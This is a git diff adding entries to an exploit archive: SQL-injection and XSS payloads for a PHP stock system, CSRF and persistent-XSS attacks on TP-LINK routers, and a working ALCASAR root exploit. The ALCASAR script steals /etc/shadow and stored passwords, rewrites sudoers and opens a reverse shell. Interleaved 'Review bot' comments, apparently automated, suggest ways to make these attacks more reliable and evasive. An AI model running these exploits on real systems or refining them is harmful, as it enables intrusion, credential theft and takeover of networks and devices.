diff --git a/files.csv b/files.csv
index 1dfa27863..0a50179b9 100755
--- a/files.csv
+++ b/files.csv
@@ -3143,7 +3143,7 @@ id,file,description,date,author,platform,type,port
 3479,platforms/linux/local/3479.php,"PHP <= 5.2.1 session_regenerate_id() Double Free Exploit",2007-03-14,"Stefan Esser",linux,local,0
 3480,platforms/linux/local/3480.php,"PHP 5.2.0/5.2.1 Rejected Session ID Double Free Exploit",2007-03-14,"Stefan Esser",linux,local,0
 3481,platforms/asp/webapps/3481.htm,"Orion-Blog 2.0 (AdminBlogNewsEdit.asp) Remote Auth Bypass Vuln",2007-03-15,WiLdBoY,asp,webapps,0
-3482,platforms/windows/remote/3482.pl,"WarFTP 1.65 (USER) Remote Buffer Overflow SEH Overflow Exploit",2007-03-15,"Umesh Wanve",windows,remote,21
+3482,platforms/windows/remote/3482.pl,"WarFTP 1.65 - (USER) Remote Buffer Overflow SEH Overflow Exploit",2007-03-15,"Umesh Wanve",windows,remote,21
 3483,platforms/php/webapps/3483.pl,"Woltlab Burning Board 2.x (usergroups.php) Remote SQL Injection Exploit",2007-03-15,x666,php,webapps,0
 3484,platforms/php/webapps/3484.txt,"WebLog (index.php file) Remote File Disclosure Vulnerability",2007-03-15,Dj7xpl,php,webapps,0
 3485,platforms/php/webapps/3485.txt,"Company WebSite Builder PRO 1.9.8 (INCLUDE_PATH) RFI Vulnerability",2007-03-15,the_day,php,webapps,0
@@ -31137,5 +31137,23 @@ id,file,description,date,author,platform,type,port
 34571,platforms/php/webapps/34571.py,"Joomla Spider Calendar <= 3.2.6 - SQL Injection",2014-09-08,"Claudio Viviani",php,webapps,0
 34572,platforms/php/webapps/34572.txt,"Wordpress Bulk Delete Users by Email Plugin 1.0 - CSRF",2014-09-08,"Fikri Fadzil",php,webapps,0
 34578,platforms/php/webapps/34578.txt,"WordPress Acento Theme (view-pdf.php, file param) - Arbitrary File Download",2014-09-08,alieye,php,webapps,80
+34579,platforms/php/webapps/34579.txt,"vBulletin 5.1.X - Persistent Cross Site Scripting",2014-09-08,smash,php,webapps,80
+34580,platforms/php/webapps/34580.txt,"phpMyFAQ 2.8.X - Multiple Vulnerabilities",2014-09-08,smash,php,webapps,80
+34581,platforms/php/webapps/34581.txt,"Zen Cart 1.5.3 - Multiple Vulnerabilities",2014-09-08,smash,php,webapps,80
+34582,platforms/php/webapps/34582.txt,"osCommerce 2.3.4 - Multiple vulnerabilities",2014-09-08,smash,php,webapps,80
+34583,platforms/hardware/webapps/34583.txt,"TP-LINK Model No. TL-WR340G / TL-WR340GD - Multiple Vulnerabilities",2014-09-08,smash,hardware,webapps,80
+34584,platforms/hardware/webapps/34584.txt,"TP-LINK Model No. 
TL-WR841N / TL-WR841ND - Multiple Vulnerabilities",2014-09-08,smash,hardware,webapps,80
+34585,platforms/php/webapps/34585.txt,"Atmail Webmail 7.2 - Multiple Vulnerabilities",2014-09-08,smash,php,webapps,443
 34586,platforms/php/webapps/34586.txt,"Mpay24 PrestaShop Payment Module 1.5 - Multiple Vulnerabilities",2014-09-08,"Eldar Marcussen",php,webapps,80
 34587,platforms/multiple/webapps/34587.txt,"Jenkins 1.578 - Multiple Vulnerabilities",2014-09-08,JoeV,multiple,webapps,8090
+34588,platforms/aix/dos/34588.txt,"PHP Stock Management System 1.02 - Multiple Vulnerabilty",2014-09-09,jsass,aix,dos,0
+34592,platforms/linux/shellcode/34592.c,"Obfuscated Shellcode Linux x86 - chmod 777 (/etc/passwd + /etc/shadow) & Add New Root User & Execute /bin/bash",2014-09-09,"Ali Razmjoo",linux,shellcode,0
+34594,platforms/windows/remote/34594.rb,"ManageEngine Desktop Central StatusUpdate Arbitrary File Upload",2014-09-09,metasploit,windows,remote,8020
+34595,platforms/linux/remote/34595.py,"ALCASAR 2.8 Remote Root Code Execution Vulnerability",2014-09-09,eF,linux,remote,80
+34596,platforms/php/webapps/34596.txt,"Pligg CMS 1.0.4 SQL Injection and Cross Site Scripting Vulnerabilities",2010-09-03,"Bogdan Calin",php,webapps,0
+34597,platforms/php/webapps/34597.txt,"Datetopia Buy Dating Site Cross Site Scripting Vulnerability",2010-09-10,Moudi,php,webapps,0
+34598,platforms/php/webapps/34598.txt,"SZNews 2.7 'printnews.php3' Remote File Include Vulnerability",2009-09-11,"kurdish hackers team",php,webapps,0
+34599,platforms/php/webapps/34599.txt,"tourismscripts HotelBook 'hotel_id' Parameter Multiple SQL Injection Vulnerabilities",2009-09-10,Mr.SQL,php,webapps,0
+34600,platforms/php/webapps/34600.txt,"Match Agency BiZ edit_profile.php important Parameter XSS",2009-09-11,Moudi,php,webapps,0
+34601,platforms/php/webapps/34601.txt,"Match Agency BiZ report.php pid Parameter XSS",2009-09-11,Moudi,php,webapps,0
+34602,platforms/windows/dos/34602.html,"Microsoft Internet Explorer 7/8 CSS Handling 
Cross Domain Information Disclosure Vulnerability",2010-09-06,"Chris Evans",windows,dos,0 diff --git a/platforms/aix/dos/34588.txt b/platforms/aix/dos/34588.txt new file mode 100755 index 000000000..c471a5b7f --- /dev/null +++ b/platforms/aix/dos/34588.txt @@ -0,0 +1,189 @@ +# Exploit Title: PHP Stock Management System 1.02 - Multiple Vulnerabilty +# Date : 9-9-2014 +# Author : jsass +?# Vendor Homepage: ?http://www.posnic.com/? +# Software Link:? http://sourceforge.net/projects/stockmanagement/ +# Version: ?1.02 +# Tested on: kali linux +# Twitter : @KwSecurity +# Group : Q8 GRAY HAT TEAM + +######################################################################################################### + + + +XSS install.php + +code : + +if(isset($_REQUEST['msg'])) { + + $msg=$_REQUEST['msg']; + echo "
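Review bot: The new 34588 row indexes a PHP web-application advisory as `platforms/aix/dos/34588.txt` with platform `aix` and type `dos`, although the advisory added in this same commit describes XSS, SQL injection and upload issues in a PHP product tested on Kali; the row (and the file path) should follow the sibling entries, i.e. `34588,platforms/php/webapps/34588.txt,"PHP Stock Management System 1.02 - Multiple Vulnerabilities",2014-09-09,jsass,php,webapps,80`. The description also carries the typo `Vulnerabilty` copied from the advisory header. Presumably the index is generated from the headers, so correcting only the advisory would not fix the platform and type columns here.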

$msg

"; + } + + +exploit : + +http://localhost/demo/POSNIC1.02DesignFix/install.php?msg=1%22%3E%3Cscript%3Ealert%28%27jsass%27%29%3C/script%3E + + +######################################################################################################### + +SQL INJECTION : stock.php + +code : + + +include_once("init.php"); +$q = strtolower($_GET["q"]); +if (!$q) return; +$db->query("SELECT * FROM stock_avail where quantity >0 "); + while ($line = $db->fetchNextObject()) { + + if (strpos(strtolower($line->name), $q) !== false) { + echo "$line->name\n"; + + } + } + + +exploit : + + +localhost/demo/POSNIC1.02DesignFix/stock.php?q=2(inject) + + +######################################################################################################### +SQL INJECTION : view_customers.php + + + + +code : + +$SQL = "SELECT * FROM customer_details"; +if(isset($_POST['Search']) AND trim($_POST['searchtxt'])!="") +{ + +$SQL = "SELECT * FROM customer_details WHERE customer_name LIKE '%".$_POST['searchtxt']."%' OR customer_address LIKE '%".$_POST['searchtxt']."%' OR customer_contact1 LIKE '%".$_POST['searchtxt']."%' OR customer_contact1 LIKE '%".$_POST['searchtxt']."%'"; + + +} + + + + + +exploit : + + +http://localhost/demo/POSNIC1.02DesignFix/view_customers.php + +POST + +searchtxt=1(inject)&Search=Search + +searchtxt=-1' /*!UNION*/ /*!SELECT*/ 1,/*!12345CONCAT(id,0x3a,username,0x3a,password)*/,3,4,5,6+from stock_user-- -&Search=Search +######################################################################################################### + + +SQL INJECTION : view_product.php + +code : + +if(isset($_GET['limit']) && is_numeric($_GET['limit'])){ + $limit=$_GET['limit']; + $_GET['limit']=10; +} + + $page = $_GET['page']; + + + if($page) + + $start = ($page - 1) * $limit; //first item to display on this page + + else + + $start = 0; //if no page var is given, set start to 0 + + + + /* Get data. 
*/ + + $sql = "SELECT * FROM stock_details LIMIT $start, $limit "; + if(isset($_POST['Search']) AND trim($_POST['searchtxt'])!="") +{ + + $sql= "SELECT * FROM stock_details WHERE stock_name LIKE '%".$_POST['searchtxt']."%' OR stock_id LIKE '%".$_POST['searchtxt']."%' OR supplier_id LIKE '%".$_POST['searchtxt']."%' OR date LIKE '%".$_POST['searchtxt']."%' LIMIT $start, $limit"; + + +} + + + $result = mysql_query($sql); + + + +exploit : + +localhost/demo/POSNIC1.02DesignFix/view_product.php?page=1&limit=1(inject) +and + +localhost/demo/POSNIC1.02DesignFix/view_product.php +post +searchtxt=a(inject)&Search=Search + + + + +######################################################################################################### + +UPLOAD : logo_set.php + +code : + + 0) + { + echo "Return Code: " . $_FILES["file"]["error"] . "
"; + } + else + { + $upload= $_FILES["file"]["name"] ; + $type=$_FILES["file"]["type"]; + + + + + + +exploit : + +http://localhost/demo/POSNIC1.02DesignFix/logo_set.php +######################################################################################################### + + + +AND MORE BUGS + +Bye + +######################################################################################################### + + +Great's : Nu11Byt3 , dzkabyle , Massacreur , Ze3r0Six , Hannibal , OrPh4ns , rDNix , OxAlien , Dead HackerZ , Somebody Knight + +sec4ever.com & alm3refh.com + +######################################################################################################### \ No newline at end of file diff --git a/platforms/hardware/webapps/34583.txt b/platforms/hardware/webapps/34583.txt new file mode 100755 index 000000000..c94617535 --- /dev/null +++ b/platforms/hardware/webapps/34583.txt 
@@ -0,0 +1,183 @@ +#Title: TP-LINK Model No. TL-WR340G/TL-WR340GD - Multiple Vulnerabilities +#Date: 01.07.14 +#Vendor: TP-LINK +#Affected versions: TL-WR340G/TL-WR340GD +#Tested on: Firmware Version - 4.3.7 Build 090901 Rel.61899n, Hardware Version - WR340G v5 081520C2 [at] Linux +#Contact: smash [at] devilteam.pl + +Persistent Cross Site Scripting vulnerabilities exists because of poor parameters filtration. Our value is stored in javascript array, since it's not correctly verified nor filtered, it is able to inject javascript code. It will be executed whenever user will visit specific settings page. Because of no CSRF prevention, it is able to compromise router. Attacker may force user to restore factory default settings, and then to turn on remote managment; in result, it will be able to log in using default username and password (admin:admin). + +Config file - 192.168.1.1/userRpm/config.bin + + +#1 - Cross Site Scripting + + + a) Persistent XSS in Network > WAN Settings + +Vulnerable parameter - hostName. + +Request: +GET /userRpm/WanDynamicIpCfgRpm.htm?wantype=Dynamic+IP&hostName=%3C/script%3E%3Cscript%3Ealert(123)%3C/script%3E&mtu=1500&Save=Save HTTP/1.1 +Host: 192.168.1.1 + +Response: +HTTP/1.1 200 OK +Server: Router +Connection: close +Content-Type: text/html +WWW-Authenticate: Basic realm="TP-LINK Wireless Router WR340G" + +", +0,0 ); + +(...) + + + b) Persitent XSS in Wireless Settings + +Vulnerable parameter - ssid. 
+ +Request: +GET /userRpm/WlanNetworkRpm.htm?ssid=%3C%2Fscript%3Exssed%3C%3E®ion=102&channel=6&mode=2&ap=2&broadcast=2&secType=1&secOpt=3&keytype=1&key1=&length1=0&key2=&length2=0&key3=&length3=0&key4=&length4=0&Save=Save HTTP/1.1 +Host: 192.168.1.1 + +Response: +HTTP/1.1 200 OK +Server: Router +Connection: close +Content-Type: text/html +WWW-Authenticate: Basic realm="TP-LINK Wireless Router WR340G" + +xssed<>", 114, 102, 1, 6, 2, 1, 1, 0, "", "", "", "", "", "", 0, 1, "333", 1, "11", 1, "0.0.0.0", 1812, "", "", 86400, 86400, 1, +0,0 ); + +(...) + + + c) Persistent XSS in DHCP Settings + +Vulnerable parameter - domain. + +Request: +GET /userRpm/LanDhcpServerRpm.htm?dhcpserver=1&ip1=192.168.1.100&ip2=192.168.1.199&Lease=120&gateway=0.0.0.0&domain='"&dnsserver=0.0.0.0&dnsserver2=0.0.0.0&Save=Save HTTP/1.1 +Host: 192.168.1.1 +Referer: http://192.168.1.1/userRpm/LanDhcpServerRpm.htm + +Response: +HTTP/1.1 200 OK +Server: Router +Connection: close +Content-Type: text/html +WWW-Authenticate: Basic realm="TP-LINK Wireless Router WR340G" + +'\"", +"0.0.0.0", +"0.0.0.0", +1, +1, +0,0 ); + +(...) + + + d) Persitent XSS in Security > Domain Filtering + +Vulnerable parameter - domain; value is being validated by js to prevent illegal characters in domain name. It is able to avoid this filtration by sending raw http request. + +Request: +GET /userRpm/DomainFilterRpm.htm?begintime=0000&endtime=2400&domain=hm'"&State=1&Changed=1&SelIndex=0&Page=1&Save=Save HTTP/1.1 +Host: 192.168.1.1 + +Response: +HTTP/1.1 200 OK +Server: Router +Connection: close +Content-Type: text/html +WWW-Authenticate: Basic realm="TP-LINK Wireless Router WR340G" + +'\"", 1, +0,0 ); + +(...) + + + e) Persistent XSS in Dynamic DNS Settings + +Vulnerable parameters - username & cliUrl. 
+ +Request: +GET /userRpm/DynDdnsRpm.htm?provider=2&username=&pwd=&cliUrl=&Save=Save HTTP/1.1 +Host: 192.168.1.1 + +Response: +HTTP/1.1 200 OK +Server: Router +Connection: close +Content-Type: text/html +WWW-Authenticate: Basic realm="TP-LINK Wireless Router WR340G" + +", +0, +0, +2, +2, +0, +1, +0,0 ); + +(...) + + +#2 - CSRF + + + a) Change LAN IP + +Parameter lanip stands for further ip. + +GET /userRpm/NetworkLanCfgRpm.htm?lanip=192.168.1.2&lanmask=255.255.255.0&Save=Save HTTP/1.1 +Host: 192.168.1.1 + + + b) Change remote managment settings + +GET /userRpm/ManageControlRpm.htm?port=80&ip=0.0.0.0&Save=Save HTTP/1.1 +Host: 192.168.1.1 + + + c) Clear syslog + +GET /userRpm/SystemLogRpm.htm?Clearlog=Clear+All HTTP/1.1 +Host: 192.168.1.1 + + + d) Reboot device + +GET /userRpm/SysRebootRpm.htm?Reboot=Reboot HTTP/1.1 +Host: 192.168.1.1 + + + e) Restore factory defaults (admin:admin) + +GET /userRpm/RestoreDefaultCfgRpm.htm?Restorefactory=Restore HTTP/1.1 +Host: 192.168.1 \ No newline at end of file diff --git a/platforms/hardware/webapps/34584.txt b/platforms/hardware/webapps/34584.txt new file mode 100755 index 000000000..15535e921 --- /dev/null +++ b/platforms/hardware/webapps/34584.txt 
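Review bot: Every response shown carries `WWW-Authenticate: Basic realm="TP-LINK Wireless Router WR340G"`, so the CSRF chain in #2 and the persistent XSS payloads only land when the victim's browser already holds cached Basic credentials for 192.168.1.1; the write-up should state that precondition, since it is what limits the attack to users who have logged into the router in the current browser session. In #2 b), `ManageControlRpm.htm?port=80&ip=0.0.0.0` is presented as turning remote management on, but on TP-LINK firmware an address of 0.0.0.0 is, as far as I recall, the value that disables remote management (255.255.255.255 permits any host), so the PoC URL should be confirmed on the tested build and corrected if so. The file also ends mid-line (`Host: 192.168.1`), so the last request is truncated.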
@@ -0,0 +1,194 @@ +#Title: TP-LINK Model No. TL-WR841N / TL-WR841ND - Multiple Vulnerabilities +#Date: 30.06.14 +#Vendor: TP-LINK +#Affected versions: TL-WR841N / TL-WR841ND +#Tested on: Firmware Version - 3.13.27 Build 121101 Rel.38183n, Hardware Version - WR841N v8 00000000 [at] Linux +#Contact: smash [at] devilteam.pl + +#1 - Reflected XSS in Wireless Settings + +Vulnerable parameters - ssid1, ssid2, ssid3, ssid4. + +Variables of ssid parameters are being included to wlanPara array. Because of poor filtration of those values, it is able to execute specific javascript command as shown below. + +While system log and config is being saved as local file (http://192.168.0.1/userRpm/SystemLog.txt & http://192.168.0.1/userRpm/config.bin), it is able to hjiack both via xss. + +Request: +http://192.168.0.1/userRpm/WlanNetworkRpm.htm?ssid1=ROUTERNAME&ssid2=ROUTERNAME_2&ssid3=ROUTERNAME_3&ssid4=ROUTERNAME_4®ion=101&band=0&mode=5&chanWidth=2&channel=15&rate=71&ap=1&broadcast=2&brlssid=&brlbssid=&keytype=1&wepindex=1&authtype=1&keytext=&Save=Save + +Response: +HTTP/1.1 200 OK +Server: Router Webserver +Connection: close +Content-Type: text/html +WWW-Authenticate: Basic realm="TP-LINK Wireless N Router WR841N" +(...) +",108,101,1,5,1,1,15,2,71,0,0,0,"cript>","ROUTERNAME_3","ROUTERNAME_4",691810163,0,0,0,"","",1,"",1,1,3,3,0,1,1,36,0,0,"","","","","","","","",1,"",0,"","",1,0,0,1,0,1,0,0 ); + + +#2 - Persistent XSS & CSRF in Wireless Security Settings + +Vulnerable parameter - pskSecret. + +Same as above, variable of pskSecret (password) is being included in javascript array. Because of no CSRF prevention, it is able to change the password by visiting url below. pskSecret value is responsible for further password. 
+ +Request: +http://192.168.0.1/userRpm/WlanSecurityRpm.htm?secType=3&pskSecOpt=2&pskCipher=3&pskSecret=test&interval=0&wpaSecOpt=3&wpaCipher=1&radiusIp=&radiusPort=1812&radiusSecret=&intervalWpa=0&wepSecOpt=3&keytype=1&keynum=1&key1=&length1=0&key2=&length2=0&key3=&length3=0&key4=&length4=0&Save=Save + +Response: +HTTP/1.1 200 OK +Server: Router Webserver +Connection: close +Content-Type: text/html +WWW-Authenticate: Basic realm="TP-LINK Wireless N Router WR841N" + +", 1, 0, 0, 1, 3, 0, 0, 0, 5, 0, 1, "", 1, +0,0 ); + + +#3 - Persistent XSS & CSRF in Mail Settings + +Vulnerable parameters - FromAddr, ToAddr, SMTPAddr. + +Reason is the same. + +Request: +http://192.168.0.1/userRpm/AutoEmailRpm.htm?FromAddr=test%40test.com&ToAddr=test1%40test.com&SMTPAddr=&User=&Password=&VeriPass=&Save=Save + +Response: +HTTP/1.1 200 OK +Server: Router Webserver +Connection: close +Content-Type: text/html +WWW-Authenticate: Basic realm="TP-LINK Wireless N Router WR841N" + +", +0, +"", +0, +0, +0, +0, +0,0 ); + + +It is able to steal system logs by forcing our victim to set our mail settings via csrf, then logs will be send after visiting address below: +http://192.168.0.1/userRpm/SystemLogRpm.htm?doMailLog=2 + +#4 - Persistent XSS & CSRF in Time Settings + +Vulnerable parameters - ntpA & ntpB. + +Request: +http://192.168.0.1/userRpm/DateTimeCfgRpm.htm?timezone=0&month=7&day=1&year=2014&hour=2&minute=44&second=18&ntpA=xssed<>", +"0.0.0.0", +2, +2, +0, +2, +10, +1, +0, +3, +0, +0, +0,0 ); + + +#5 - Persistent XSS & CSRF in Dynamic DNS settings + +Vulnerable parameters - username, password, cliUrl. 
+ +Request: +http://192.168.0.1/userRpm/NoipDdnsRpm.htm?provider=3&username=&pwd=password&cliUrl=&Save=Save + +Response: +HTTP/1.1 200 OK +Server: Router Webserver +Connection: close +Content-Type: text/html +WWW-Authenticate: Basic realm="TP-LINK Wireless N Router WR841N" + +", +"password", +"", +0, +0, +3, +2, +0, +1, +0,0 ); + + +#6 - Persistent XSS & CSRF in DHCP settings + +Vulnerable parameter - domain. + +Request: +http://192.168.0.1/userRpm/LanDhcpServerRpm.htm?dhcpserver=1&ip1=192.168.0.100&ip2=192.168.0.199&Lease=120&gateway=192.168.0.1&domain=xssed<>&dnsserver=0.0.0.0&dnsserver2=0.0.0.0&Save=Save + +Response: +HTTP/1.1 200 OK +Server: Router Webserver +Connection: close +Content-Type: text/html +WWW-Authenticate: Basic realm="TP-LINK Wireless N Router WR841N" + +xssed<>", +"0.0.0.0", +"0.0.0.0", +1, +0,0 ); + + +#7 - Other CSRF's + + a) Clear system logs + +http://192.168.0.1/userRpm/SystemLogRpm.htm?logType=0&logLevel=7&ClearLog=Clear+Log&selPage=1&Page=1 + + b) Reboot device + +http://192.168.0.1/userRpm/SysRebootRpm.htm?Reboot=Reboot + + c) Factory defaults reset (admin:admin) + +http://192.168.0.1/userRpm/RestoreDefaultCfgRpm.htm?Restorefactory=Restore + +Actually, there is no prevention technique to avoid csrf in this one; bug's pointed above are most interesting. \ No newline at end of file diff --git a/platforms/linux/remote/34595.py b/platforms/linux/remote/34595.py new file mode 100755 index 000000000..f234c9507 --- /dev/null +++ b/platforms/linux/remote/34595.py 
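Review bot: In #1 the request shown carries only benign values (`ssid1=ROUTERNAME&ssid2=ROUTERNAME_2...`) while the quoted response has the remnant `"cript>"` in the ssid2 position, so the request/response pair do not belong together and the payload that produced the truncated `<s…cript>` is never given; show the real request, and note that the truncation itself suggests some server-side handling of `<script` that a reader needs to know how to get past. The heading calls this a reflected XSS, but the values are submitted with `Save=Save` and stored in the wireless settings, so it is persistent like the other findings. As in the sibling WR340G advisory, every response shown includes `WWW-Authenticate: Basic realm=...`, so the CSRF variants require the victim's browser to hold cached router credentials — that precondition belongs at the top of the advisory.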
@@ -0,0 +1,213 @@ +#!/usr/bin/env python +# -*- coding: utf-8 -*- +# +#### +# +# ALCASAR <= 2.8 Remote Root Code Execution Vulnerability +# +# Author: eF +# Date : 2014-02-10 +# +# +# db 88 ,ad8888ba, db ad88888ba db 88888888ba +# d88b 88 d8"' `"8b d88b d8" "8b d88b 88 "8b +# d8'`8b 88 d8' d8'`8b Y8, d8'`8b 88 ,8P +# d8' `8b 88 88 d8' `8b `Y8aaaaa, d8' `8b 88aaaaaa8P' +# d8YaaaaY8b 88 88 d8YaaaaY8b `"""""8b, d8YaaaaY8b 88""""88' +# d8""""""""8b 88 Y8, d8""""""""8b `8b d8""""""""8b 88 `8b +# d8' `8b 88 Y8a. .a8P d8' `8b Y8a a8P d8' `8b 88 `8b +# d8' `8b 88888888888 `"Y8888Y"' d8' `8b "Y88888P" d8' `8b 88 `8b +# +# +# ALCASAR is a free Network Access Controller which controls the Internet +# consultation networks. It authenticates, attributes and protects users' +# access regardless their connected equipment (PC, Pokédex, game console, +# etc.). +# +# +# ALCASAR Web UI, accessible by any unauthenticated user, suffers from a +# trivial vulnerability. In the "index.php" file: +# +# $pattern = preg_replace('/www./','',$_SERVER['HTTP_HOST']); +# exec("grep -Re ^$pattern$ /etc/dansguardian/lists/blacklists/*/domains|cut -d'/' -f6", $output); +# +# By sending a specially crafted value in the "host" HTTP header, it is possible +# to inject the exec() function in order to execute commands as Apache user. 
+# +# In addition, the Apache user is able to call sudo for these binaries: +# +# /sbin/ip,/sbin/arping,/sbin/arp,/usr/sbin/arpscan,/usr/sbin/tcpdump,/usr/local/bin/alcasar-watchdog.sh,/usr/local/sbin/alcasar-dhcp.sh +# /usr/local/bin/alcasar-conf.sh +# /usr/local/sbin/alcasar-mysql.sh +# /usr/local/sbin/alcasar-bl.sh,/usr/local/sbin/alcasar-havp.sh,/usr/local/bin/alcasar-file-clean.sh,/usr/local/sbin/alcasar-url_filter.sh +# /usr/local/sbin/alcasar-nf.sh,/usr/local/bin/alcasar-iptables.sh,/usr/sbin/ipset +# /usr/local/bin/alcasar-archive.sh +# /usr/bin/radwho,/usr/sbin/chilli_query +# /usr/local/sbin/alcasar-logout.sh +# /sbin/service,/usr/bin/killall,/sbin/chkconfig,/bin/systemctl +# /usr/bin/openssl +# +# As a result, we can use /usr/bin/openssl to read a file as root: +# +# sudo /usr/bin/openssl base64 -in /etc/shadow -A | base64 -d +# +# Or to create or overwrite files as root (create a cron job, edit /etc/sudoers, etc.): +# +# echo cHduZWQK | sudo /usr/bin/openssl base64 -d -out /etc/cron.d/pwned +# +# In this exploit, I choose to modify the "sudoers" file. +# +# Note: this vulnerability has been discovered in less than 30 seconds. +# Others vulnerabilities are still present. This code has never been audited... +# The PHP code is dreadful and needs to be rewritten from scratch. +# +# Example (post-auth) in file acc/admin/activity.php: +# +# if (isset($_POST['action'])){ +# switch ($_POST['action']){ +# case 'user_disconnect' : +# exec ("sudo /usr/sbin/chilli_query logout $_POST[mac_addr]"); +# +# +# This is not a responsible disclosure coz' I have no sense of ethics and I couldn't care less. 
+# +# +# % python alcasar-2.8_rce.py alcasar.localdomain "alcasar-version.sh" +# +# [+] Hello, first here are some passwords for you: +# Password to protect the boot menu (GRUB) : cV9eEz1g +# Name and password of Mysql/mariadb administrator : root / FvYPr7b3 +# Name and password of Mysql/mariadb user : radius / oRNln64j +# Shared secret between the script 'intercept.php' and coova-chilli : b9Rj34jz +# Shared secret between coova-chilli and FreeRadius : 7tIrnkJu +# +# root:$2a$08$Aw4yIxQIUJ0taDjiXKSRYu6zZB5eUcbZ4445vo1157AdeGSfe1XuC:16319:0:99999:7::: +# +# [...] +# +# admin:alcasar.localdomain:49b8642b4646a4afa38cda065f76ce0e +# +# username value +# user $1$passwd$qr0Ajhr12fZ475a2qAZ.H. +# +# [-] whoami (should be apache): +# uid=495(apache) gid=492(apache) groups=492(apache) +# +# [+] On the way to the uid 0... +# [-] Got root? +# uid=0(root) gid=0(root) groups=0(root) +# +# [+] Your command Sir: +# The Running version (2.8) is up to date +# +# +#### + +import sys, os, re, httplib + +class PWN_Alcasar: + + def __init__(self, host): + self.host = host + self.root = False + + def exec_cmd(self, cmd, output=False): + tag = os.urandom(4).encode('hex') + + cmd = 'bash -c "%s" 2>&1' % cmd.replace('"', '\\"') + if self.root: + cmd = 'sudo %s' % cmd + + headers = { + 'host' : 'aAaAa index.php;echo %s;echo %s|base64 -d -w0|sh|base64 -w0;#' % (tag, cmd.encode('base64').replace('\n','')) + } + + c = httplib.HTTPConnection(self.host) + c.request('GET', '/index.php', '', headers) + r = c.getresponse() + data = r.read() + c.close() + + if data.find(tag) != -1: + m = re.search(r'%s, (.*)\s' % tag, data) + if m: + data = m.group(1).decode('base64') + if output: + print data + return data + return None + + def read_file(self, filepath, output=True): + return self.exec_cmd('sudo openssl base64 -in %s -A|base64 -d' % filepath, output=output) + + def read_passwords(self): + self.read_file('/root/ALCASAR-passwords.txt') + self.read_file('/etc/shadow') + 
self.read_file('/usr/local/etc/digest/key_all') + self.read_file('/usr/local/etc/digest/key_admin') + self.read_file('/usr/local/etc/digest/key_backup') + self.read_file('/usr/local/etc/digest/key_manager') + self.read_file('/usr/local/etc/digest/key_only_admin') + self.read_file('/usr/local/etc/digest/key_only_backup') + self.read_file('/usr/local/etc/digest/key_only_manager') + alcasar_mysql = self.read_file('/usr/local/sbin/alcasar-mysql.sh', output=False) + if alcasar_mysql: + m = re.search(r'radiuspwd="(.*)"', alcasar_mysql) + if m: + radiuspwd = m.group(1) + sql = 'SELECT username,value FROM radcheck WHERE attribute like \'%%password%%\'' + self.exec_cmd('mysql -uradius -p\"%s\" radius -e "%s"' % (radiuspwd, sql), output=True) + + def edit_sudoers(self): + self.exec_cmd('sudo openssl base64 -in /etc/sudoers -out /tmp/sudoers.b64') + self.exec_cmd('openssl base64 -d -in /tmp/sudoers.b64 -out /tmp/sudoers') + self.exec_cmd('sed -i s/BL,NF/BL,ALL,NF/g /tmp/sudoers') + self.exec_cmd('sudo openssl base64 -in /tmp/sudoers -out /tmp/sudoers.b64') + self.exec_cmd('sudo openssl base64 -d -in /tmp/sudoers.b64 -out /etc/sudoers') + self.exec_cmd('sudo rm -f /tmp/sudoers*') + self.root = True + + def reverse_shell(self, rip, rport='80'): + payload = 'import socket,subprocess,os;' + payload += 's=socket.socket(socket.AF_INET,socket.SOCK_STREAM);' + payload += 's.connect((\'%s\',%s));' % (rip, rport) + payload += 'os.dup2(s.fileno(),0);' + payload += 'os.dup2(s.fileno(),1);' + payload += 'os.dup2(s.fileno(),2);' + payload += 'p=subprocess.call([\'/bin/sh\',\'-i\']);' + return self.exec_cmd('python -c "%s"' % payload) + +def usage(): + print 'Usage: %s host command (ip) (port)' % sys.argv[0] + print ' "command" can be a shell command or "reverseshell"' + sys.exit(0) + +if __name__ == '__main__': + + if len(sys.argv) < 3: + usage() + + cmd = sys.argv[2] + if cmd == 'reverseshell': + if len(sys.argv) < 5: + print '[!] Need IP and port for the reverse shell...' 
+ sys.exit(0) + rip = sys.argv[3] + rport = sys.argv[4] # 80 is a good one... + + exploit = PWN_Alcasar(sys.argv[1]) + print '[+] Hello, first here are some passwords for you:' + exploit.read_passwords() + print '[-] whoami (should be apache):' + exploit.exec_cmd('id', output=True) + print '[+] On the way to the uid 0...' + exploit.edit_sudoers() + print '[-] Got root?' + exploit.exec_cmd('id', output=True) + if cmd == 'reverseshell': + print '[+] You should now have a shell on %s:%s' % (rip, rport) + exploit.reverse_shell(rip, rport) + else: + print '[+] Your command Sir:' + exploit.exec_cmd(cmd, output=True) + sys.exit(1) \ No newline at end of file diff --git a/platforms/linux/shellcode/34592.c b/platforms/linux/shellcode/34592.c new file mode 100755 index 000000000..a2d639d2b --- /dev/null +++ b/platforms/linux/shellcode/34592.c 
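Review bot: `edit_sudoers` sets `self.root = True` unconditionally, yet nothing checks that `sed -i s/BL,NF/BL,ALL,NF/g` matched anything, so on a sudoers layout that differs from the tested 2.8 build the script overwrites `/etc/sudoers` with an unchanged copy, every later `sudo bash -c ...` fails, and `main` still prints `[-] Got root?` as if the escalation worked. Guard the two `sudo openssl` lines that replace the real file with a check on the edited copy, e.g. `if (self.exec_cmd('grep -c BL,ALL,NF /tmp/sudoers') or '0').strip() == '0':` / `    print '[!] BL,NF alias not found in sudoers; leaving /etc/sudoers untouched'` / `    return`, and consider running `visudo -c -f /tmp/sudoers` first, since a malformed sudoers disables sudo for every account on the host. The `or '0'` matters because `exec_cmd` returns `None` whenever the output tag is not found in the response, and the `rm -f /tmp/sudoers*` cleanup should run on the early-return path too.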
